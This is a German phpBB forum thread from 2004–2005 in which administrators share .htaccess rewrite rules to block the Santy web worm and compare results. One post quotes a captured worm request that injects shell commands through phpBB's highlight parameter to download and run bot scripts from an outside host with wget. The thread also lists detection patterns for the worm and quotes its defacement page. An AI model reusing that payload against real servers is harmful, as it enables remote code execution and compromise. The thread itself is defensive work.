Schutz vor dem phpBB-Wurm mittels .htaccess

Hier die Newsecke (Kein Support!)
Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29111
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Schutz vor dem phpBB-Wurm mittels .htaccess

Beitrag von oxpus » Mi 29.Dez, 2004 20:10

Neben dem CrackerTracker von cback ist der Schutz mittels .htaccess auch zu empfehlen.
Folgendes ist dazu in eine .htaccess-Datei zu schreiben, die auf dem Hauptverzeichnis Eures Webspaces liegen muss:

Code: Alles auswählen

RewriteEngine On

# prevent access from santy webworm
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
Original-Post hierzu auf phpbb.de, Autor des Codes: larsneo
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
AmigaLink
Moderator
Moderator
Beiträge: 6211
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink » Mi 29.Dez, 2004 22:55

Cool - Ich hab das jetzt seit ca. 1 Stunde in meiner .htaccess und der CTracker hat kaum noch was zu tun. :D
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]

Benutzeravatar
adjustMan
User
User
Beiträge: 207
Registriert: Fr 17.Sep, 2004 23:03

Re: Schutz vor dem phpBB-Wurm mittels .htaccess

Beitrag von adjustMan » Do 30.Dez, 2004 00:08

[quote="oxpus - Mi 29.Dez, 2004 20:10";p="19461"]Neben dem CrackerTracker von cback ist der Schutz mittels .htaccess auch zu empfehlen.
Folgendes ist dazu in eine .htaccess-Datei zu schreiben, die auf dem Hauptverzeichnis Eures Webspaces liegen muss[/quote]
Im root Verzeichnis vom Webspace oder vom Forum?
PS: Ich habe auch ohne .htaccess seit vorgestern keine Angriffe mehr. Wundert mich`n bisschen. :confused:
cu aM

Benutzeravatar
Bootenks
Developer
Developer
Beiträge: 2034
Registriert: Sa 29.Mai, 2004 22:36
Wohnort: G?rlitz (?stlichste Stadt Deutschlands)
Kontaktdaten:

Beitrag von Bootenks » Do 30.Dez, 2004 01:30

also in root von Webspace sonst ist das ja sinnlos ;) sonst sperrste dich ja von deinem eigenem Foum :-P
Nur ein Informatik Student. ^^

Benutzeravatar
adjustMan
User
User
Beiträge: 207
Registriert: Fr 17.Sep, 2004 23:03

Beitrag von adjustMan » Do 30.Dez, 2004 01:54

@Bootenks

Und was sagst zu meinem PS? Is das normal, 2 Tage keine Angriffe. (Ich bin ja froh :) )
cu aM

Benutzeravatar
cbrkiter
User
User
Beiträge: 170
Registriert: Fr 26.Nov, 2004 01:30
Kontaktdaten:

Beitrag von cbrkiter » Do 30.Dez, 2004 02:39

Also mit .htaccess kenne ich mich überhaupt nicht aus. Ich weiß zwar, dass einiges damit möglich sein soll, aber bisher habe ich nie wirklich irgendwas ausprobiert - geschweige denn mich damit informell beschäfftigt. Daher mal 'ne kurze Frage:

Ich habe in meiner .htaccess bereits folgende Zeile:

Code: Alles auswählen

DirectoryIndex index.html intro.php portal.php index.php index.htm
Soll ich den neuen Text nun vor oder hinter dieser Zeile einfügen? Ist das egal oder beißt sich dann irgendwas?

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29111
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 30.Dez, 2004 11:10

Hinter die Zeile.
Und danach ist wirklich Ruhe. Mein Logfile vom CrackerTracker ist seitdem leer.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
cback
Moderator
Moderator
Beiträge: 1556
Registriert: Sa 15.Mai, 2004 14:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback » Do 30.Dez, 2004 11:27

*lach*
wär bei mir auch so, nach einbau der .htaccess hat mein Server selbst mich gar nich mehr aufs Forum gelassen lool :D

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29111
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 30.Dez, 2004 11:29

Tjoar, liegt wohl an Deinem Apache, der etwas anders arbeiten möchte, oder?
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
cback
Moderator
Moderator
Beiträge: 1556
Registriert: Sa 15.Mai, 2004 14:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback » Do 30.Dez, 2004 12:41

Jo mein Apache 2.0.52 scheint nen eigenen Willen zu haben :D

Benutzeravatar
AmigaLink
Moderator
Moderator
Beiträge: 6211
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink » Do 30.Dez, 2004 12:42

Also nachdem ich den Code in der .htaccess des Server Root hatte, ist der CTracker zu ca. 70% Arbeitslos gewesen. :) Und nachdem ich den Code in die .htaccess des Board-Roots gesetzt hab, ist komplett ruhe. :D
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]

Benutzeravatar
cback
Moderator
Moderator
Beiträge: 1556
Registriert: Sa 15.Mai, 2004 14:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback » Do 30.Dez, 2004 12:47

"Er" wird übrigens wieder recht aktiv wie man hier sieht:

http://www.kdeuser.de

aber eins muss man dem Wurm lassen, er macht konformes html:

Code: Alles auswählen

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>This site is defaced!!!</TITLE>
</HEAD><BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR>
<ADDRESS><b>NeverEverNoSanity WebWorm generation 21.</b></ADDRESS>
</BODY></HTML>
Zuletzt geändert von cback am Do 30.Dez, 2004 12:48, insgesamt 1-mal geändert.

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29111
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 30.Dez, 2004 13:07

aber eins muss man dem Wurm lassen, er macht konformes HTML
:lol:
Na wenn das das Einzigste wäre, was er täte ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
Bootenks
Developer
Developer
Beiträge: 2034
Registriert: Sa 29.Mai, 2004 22:36
Wohnort: G?rlitz (?stlichste Stadt Deutschlands)
Kontaktdaten:

Beitrag von Bootenks » Do 30.Dez, 2004 15:01

also wenn ich es in mein root des boards packe dann komm ich selber nimmer rein, desshalb habe ich ihn in den root des Webspace getan und es scheint och zu funzen ;)
Nur ein Informatik Student. ^^

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29111
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 30.Dez, 2004 15:22

Da muss es ja auch hin: In den Root des Webspaces.

cback: Hier den gleichen Fehler gemacht?
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
cback
Moderator
Moderator
Beiträge: 1556
Registriert: Sa 15.Mai, 2004 14:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback » Do 30.Dez, 2004 15:53

nö in dem Punkt alles korrrrrrrrrrrekt gemacht ;)

Hab noch andere Dinge probiert doch
1000x probiert, 1000x is nichts passiert.... ^7 (bzw. DAS passiert) ;)
Zuletzt geändert von cback am Do 30.Dez, 2004 16:04, insgesamt 1-mal geändert.

frank1606
User
User
Beiträge: 47
Registriert: Fr 13.Aug, 2004 12:01
Kontaktdaten:

Beitrag von frank1606 » Fr 31.Dez, 2004 18:57

Hallo

also ich hab auch alles eingebaut , aber bei mir steht da nichts in der Logfile.

Hänge mal die Viewtopic an.
Beschreibunhier die Viewtopic.php

Die Url ist www.tierfreunde-forum.net
Kann mir da einer Helfen??

Danke
Bild

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29111
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Fr 31.Dez, 2004 20:38

also ich hab auch alles eingebaut , aber bei mir steht da nichts in der Logfile.
Das ist Dir auch weiterhin zu wünschen, denn dann hat der Wurm Dein Board noch nicht entdeckt.
Ich habe jetzt einen Eintrag verursache, indem ich einen Test gemacht habe. Und der war erfolgreich.
Also kein Grund zur Besorgnis, der Schutz wirkt bei Dir 100%ig.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
adjustMan
User
User
Beiträge: 207
Registriert: Fr 17.Sep, 2004 23:03

Beitrag von adjustMan » So 02.Jan, 2005 03:46

kann man diese anweisungen nicht gleich in die httpd.conf schreiben?
cu aM

Benutzeravatar
AmigaLink
Moderator
Moderator
Beiträge: 6211
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink » So 02.Jan, 2005 05:37

Das ist Dir auch weiterhin zu wünschen, denn dann hat der Wurm Dein Board noch nicht entdeckt.
Na darüber kann man jetzt streiten!
Der Sanity sucht sich seine Opfer, meines wissens nach, über Google. Wenn er ein Board schon nicht findet, dann ist das bei neuen Usern auch nicht viel besser. :(
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]

Benutzeravatar
blondi
User
User
Beiträge: 1091
Registriert: Do 30.Sep, 2004 13:36

Beitrag von blondi » So 02.Jan, 2005 05:39

nicht nur über google mittlerweilen auch via yahoo...

Benutzeravatar
blondi
User
User
Beiträge: 1091
Registriert: Do 30.Sep, 2004 13:36

Beitrag von blondi » So 02.Jan, 2005 06:45

@cback & Oxpus...

mir ist eben aufgefallen das der wurm nun einen bot nutz...

Code: Alles auswählen

LWP::Simple/5.53
t=58&rush=echo%20_START_%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://xiahello.com/mw/bot.htm;wget%20http://xiahello.com/mw/ssh.htm;perl%20ssh.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';
lieben gruss

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29111
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » So 02.Jan, 2005 09:55

@adjustMan
Nein, da werden diese nicht beachtet. die httpd.conf beinhaltet lediglich Einstellungen des Webservers selber, nicht dessen Funktionweise in bestimmten Verzeichnissen.

@blondi
Das macht der Wurd schon länger. Und solange Du diesen Eintrag im CrackerTracker Log siehst, ist noch alles i.O., denn dann hat der Mod ihn abgefangen.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
blondi
User
User
Beiträge: 1091
Registriert: Do 30.Sep, 2004 13:36

Beitrag von blondi » So 02.Jan, 2005 17:07

Aha... Danke für die Info

Lieben Gruss

Benutzeravatar
adjustMan
User
User
Beiträge: 207
Registriert: Fr 17.Sep, 2004 23:03

Beitrag von adjustMan » So 02.Jan, 2005 22:32

[quote="oxpus - So 02.Jan, 2005 09:55";p="19698"]@adjustMan
Nein, da werden diese nicht beachtet. die httpd.conf beinhaltet lediglich Einstellungen des Webservers selber, nicht dessen Funktionweise in bestimmten Verzeichnissen.[/quote]
Wenn ich das bei mir ins Webspace schiebe, bekomme ich ein Forbidden. Und im Rootforum steht. dass man das, um alle Vhosts "mitzunehmen", ans Ende der httpd.conf setzen soll
cu aM

Antworten